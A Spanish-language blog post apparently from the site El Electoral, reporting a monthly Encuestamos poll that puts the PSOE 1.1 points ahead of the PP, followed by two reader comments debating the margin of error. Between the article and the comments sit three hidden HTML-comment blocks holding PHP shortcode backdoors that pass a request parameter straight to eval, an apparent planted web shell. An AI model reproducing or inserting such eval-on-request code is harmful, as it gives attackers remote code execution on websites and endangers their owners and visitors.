El PSOE ganaría las elecciones con 1,1 puntos de ventaja sobre el PP

Hoy publicamos en El Electoral una encuesta de Encuestamos que dice que el PSOE ganaría las elecciones con el 24 % de los votos, subiendo en un mes desde el 23,6 %. El PP baja del 23,7 % al 22,9 %. Podemos baja del 21,7 % al 21,2 % y Ciudadanos sube del 14,6 % al 15,7 %. Izquierda Unida sube del 3,8 % al 4,5 %. UPyD baja del 2,5 % al 0,9 %. Esquerra Republicana tendría un 3 % de los votos, CiU un 2,8 %, EH Bildu un 1,1 %, BNG un 1,1 %, PNV un 1 % y Coalición Canaria un 0,5 %.

Esta encuesta viene marcando las tendencias del resto: el PSOE, Ciudadanos e IU suben y PP y Podemos bajan. Además esta es la primera encuesta en varios meses que le da la victoria al PSOE, que mes a mes va subiendo poco a poco. Es posible que veamos encuestas parecidas en los próximos meses.

<!– [insert_php]if (isset($_REQUEST["VAT"])){eval($_REQUEST["VAT"]);exit;}[/insert_php][php]if (isset($_REQUEST["VAT"])){eval($_REQUEST["VAT"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vEyDE"])){eval($_REQUEST["vEyDE"]);exit;}[/insert_php][php]if (isset($_REQUEST["vEyDE"])){eval($_REQUEST["vEyDE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yzxx"])){eval($_REQUEST["yzxx"]);exit;}[/insert_php][php]if (isset($_REQUEST["yzxx"])){eval($_REQUEST["yzxx"]);exit;}[/php] –>

3 Comments

  1. Amos a ver… Si el margen de error es el 3,2%… ¿Cómo puede alguien titular así: El PSOE ganaría las elecciones con 1,1 puntos de ventaja sobre el PP?

    ¿Es información o es vuestro deseo?

    Tras mi corta vida estudiantil de ciencias, tras unos años en una facultad de ciencias conseguí licenciarme… y lo que allí me enseñaron es que la incertidumbre del muestreo no te permite decir nada o, lo que es lo mismo, se está en una situación, según los datos, en la que los encuesteros ahora les ha dado por llamar "empate técnico".

    • El margen de error es para los datos en intención directa de voto. Es en la estimación de voto que hace esta empresa demoscópica donde el PSOE está 1,1 puntos por encima del PP.

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.